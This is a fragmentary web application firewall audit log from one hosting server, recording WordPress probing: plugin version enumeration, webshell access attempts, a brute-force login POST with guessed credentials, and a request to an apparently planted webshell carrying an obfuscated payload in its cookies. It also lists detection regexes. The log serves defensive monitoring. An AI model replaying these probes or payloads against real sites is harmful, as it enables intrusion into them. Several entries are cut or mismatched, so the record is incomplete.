Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b889760f-Z-- --408bb320-A-- [01/Jul/2025:10:15:16.994216 +0530] aGNn3E2iOLYJJIAs-GUhWgAAADY 52.2.83.227 32003 192.168.74.40 443 --408bb320-B-- GET /pps/product/chik-jasmine-175ml HTTP/1.1 Connection: close Host: bmschool.in User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --408bb320-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --408bb320-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "432"] [id "77350440"] [msg "IM360 WAF: Scan attempt by Amazon bot||Range:||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2864a00-Z-- --f08f8d27-A-- [01/Jul/2025:11:03:54.668658 +0530] aGNzQjaeUPKx3wbVIjc83AAAAAQ 178.128.124.79 50782 192.168.74.40 80 --f08f8d27-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --f08f8d27-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --f08f8d27-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751348034659360 9681 (- - -) Stopwatch2: 1751348034659360 9681; combined=4856, p1=121, p2=4578, p3=0, p4=0, p5=157, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f08f8d27-Z-- --eb6d0a63-A-- [01/Jul/2025:11:03:55.153653 +0530] aGNzQfqfoIC6W-q1ciUeOwAAAAY 43.130.71.237 60776 192.168.74.40 443 --eb6d0a63-B-- GET /?p=12 HTTP/1.1 Host: thecouturelove.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --eb6d0a63-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://thecouturelove.com/my-account/ -- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/wp-includes/images/about.php||SC:/home/smtckolkata/public_html/wp-includes||"] [severity "DEBUG"] [tag "service_im360"] Stopwatch: 1751348716996176 7816 (- - -) Stopwatch2: 1751348716996176 7816; combined=4995, p1=141, p2=4563, p3=121, p4=4, p5=165, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0ab08464-Z-- --8e21627f-A-- [01/Jul/2025:11:15:17.353038 +0530] aGN17NBVQea5xcY0Z4sKaAAAAEs 103.185.74.40 36481 192.168.74.40 443 --8e21627f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8e21627f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8e21627f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348716112548 1240836 (- - -) Stopwatch2: 1751348716112548 1240836; combined=2581, p1=130, p2=2302, p3=0, p4=0, p5=149, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8e21627f-Z-- --c8c71135-A-- [01/Jul/2025:11:15:18.913494 +0530] aGN17qDMHeoQpg_c-kybJQAAAA0 20.171.207.232 53250 192.168.74.40 443 --c8c71135-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/rajasthan-tours-from-ahmedabad/js/Rajasthan-Travel-Guides/Alwar-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c8c71135-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c8c71135-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348720006532 20272 (- - -) Stopwatch2: 1751348720006532 20272; combined=4427, p1=193, p2=4057, p3=0, p4=0, p5=176, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --85658266-Z-- --f9c8940c-A-- [01/Jul/2025:11:15:20.201753 +0530] aGN17dtVjKpVQzZMAPj_wwAAABM 103.185.74.40 34514 192.168.74.40 443 --f9c8940c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --f9c8940c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f9c8940c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348717568307 2633700 (- - -) Stopwatch2: 1751348717568307 2633700; combined=3145, p1=111, p2=2842, p3=0, p4=0, p5=192, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f9c8940c-Z-- --b39d6c1a-A-- [01/Jul/2025:11:15:21.398778 +0530] aGN18HP0Jk4x95VoTQHQYwAAAB4 205.185.122.222 15613 192.168.74.40 443 --b39d6c1a-B-- POST /wp-login.php HTTP/1.1 Host: arts.net.in Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 126 Content-Type: application/x-www-form-urlencoded --b39d6c1a-C-- log=admin&redirect_to=https%3A%2F%2Farts.net.in%2Fwp-admin%2F&wp-submit=Log%2BIn&testcookie=1&rememberme=forever&pwd=hello2024 --b39d6c1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350672027474 16800 (- - -) Stopwatch2: 1751350672027474 16800; combined=3707, p1=157, p2=3391, p3=0, p4=0, p5=159, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4542543b-Z-- --94c47d24-A-- [01/Jul/2025:11:47:58.011819 +0530] aGN9lFQwuo9FDgaxsyzAWgAAAAQ 103.185.74.40 34254 192.168.74.40 443 --94c47d24-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --94c47d24-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --94c47d24-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350676819315 1193202 (- - -) Stopwatch2: 1751350676819315 1193202; combined=3368, p1=116, p2=3058, p3=0, p4=0, p5=194, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --94c47d24-Z-- --bdc8ea38-A-- [01/Jul/2025:11:48:00.205885 +0530] aGN9lsNQB2FKfldYI5vV1AAAACo 103.185.74.40 3893 192.168.74.40 443 --bdc8ea38-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --bdc8ea38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bdc8ea38-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350678224707 1981789 (- - -) Stopwatch2: 1751350678224707 1981789; combined=3438, p1=115, p2=3172, p3=0, p4=0, p5=150, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bdc8ea38-Z-- --0bc3077c-A-- [01/Jul/2025:11:48:02.217032 +0530] aGN9msIXN_Q6mf9hmKQZswAAABY 47.128.60.146 12880 192.168.74.40 443 --0bc3077c-B-- GET /rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/https/rajasthan-tours-from-jaipur/https/tnc.php HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/heif,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350682197471 20167 (- - -) Stopwatch2: 1751350682197471 20167; combined=3973, p1=172, p2=3216, p3=0, p4=0, p5=584, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0bc3077c-Z-- --a65db57a-A-- [01/Jul/2025:11:48:02.369776 +0530] aGN9mFQwuo9FDgaxsyzAWwAAAAQ 103.185.74.40 51088 192.168.74.40 443 --a65db57a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --a65db57a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a65db57a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350680708303 1661760 (- - -) Stopwatch2: 1751350680708303 1661760; combined=3689, p1=114, p2=3329, p3=0, p4=0, p5=245, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a65db57a-Z-- --dcecff4b-A-- [01/Jul/2025:11:48:02.447847 +0530] aGN9msIXN_Q6mf9hmKQZtAAAABY 47.128.60.146 12880 192.168.74.40 443 --dcecff4b-B-- GET /rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/https/rajasthan-tours-from-jaipur/https/css/main.css HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: text/css,*/*;q=0.1 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350683538774 17712 (- - -) Stopwatch2: 1751350683538774 17712; combined=3737, p1=147, p2=3148, p3=0, p4=0, p5=441, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c763bc6c-Z-- --4480814a-A-- [01/Jul/2025:11:48:05.032433 +0530] aGN9mtM7oYN-VqWG9-xaJQAAAAY 103.185.74.40 49959 192.168.74.40 443 --4480814a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4480814a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4480814a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350682580366 2452855 (- - -) Stopwatch2: 1751350682580366 2452855; combined=3356, p1=109, p2=3009, p3=0, p4=0, p5=238, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4480814a-Z-- --95f3ec58-A-- [01/Jul/2025:11:48:11.786593 +0530] aGN9o52hmv68DcpiKu1QpQAAADY 20.171.207.232 35272 192.168.74.40 443 --95f3ec58-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/images/testimonials/luxury.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --95f3ec58-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c084943e-Z-- --862a211a-A-- [01/Jul/2025:11:50:59.970229 +0530] aGN-S3kiRFXExwViSTcoWAAAACE 124.156.225.181 43506 192.168.74.40 80 --862a211a-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --862a211a-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --862a211a-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751350859963953 6754 (- - -) Stopwatch2: 1751350859963953 6754; combined=3702, p1=92, p2=3398, p3=75, p4=3, p5=134, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --862a211a-Z-- --92982776-A-- [01/Jul/2025:11:51:00.814790 +0530] aGN-TA1y54KOcSyJ2lkbzgAAAAk 20.171.207.232 56328 192.168.74.40 443 --92982776-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/images/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --92982776-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --92982776-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/rajasthan-tours-from-delhi/js/images/https/images/Car-Rentals-Bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352319072279 25378 (- - -) Stopwatch2: 1751352319072279 25378; combined=2788, p1=213, p2=2389, p3=0, p4=0, p5=186, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eebe2d4b-Z-- --99ef683b-A-- [01/Jul/2025:12:15:31.328279 +0530] aGOECQHoebBrQTuTmOgLtgAAADk 103.185.74.40 2985 192.168.74.40 443 --99ef683b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --99ef683b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --99ef683b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352329884233 1444805 (- - -) Stopwatch2: 1751352329884233 1444805; combined=2901, p1=125, p2=2595, p3=0, p4=0, p5=180, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --99ef683b-Z-- --e0e12830-A-- [01/Jul/2025:12:15:32.067547 +0530] aGOEDLEnAYhd9f7WDAyLHQAAACY 92.204.55.95 37016 192.168.74.40 443 --e0e12830-B-- POST /wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Definition/Exception/91hero.php HTTP/1.1 Host: spectra.alchemyibs.com Cookie: 4=d6cd46cb008a0343c788d20c01827b74; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoaNvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupzkyK3Ein2IhplV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="101", "Microsoft Edge";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352329483395 2652438 (- - -) Stopwatch2: 1751352329483395 2652438; combined=1101, p1=139, p2=805, p3=0, p4=0, p5=157, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ae056c47-Z-- --fcb8276a-A-- [01/Jul/2025:12:15:32.871862 +0530] 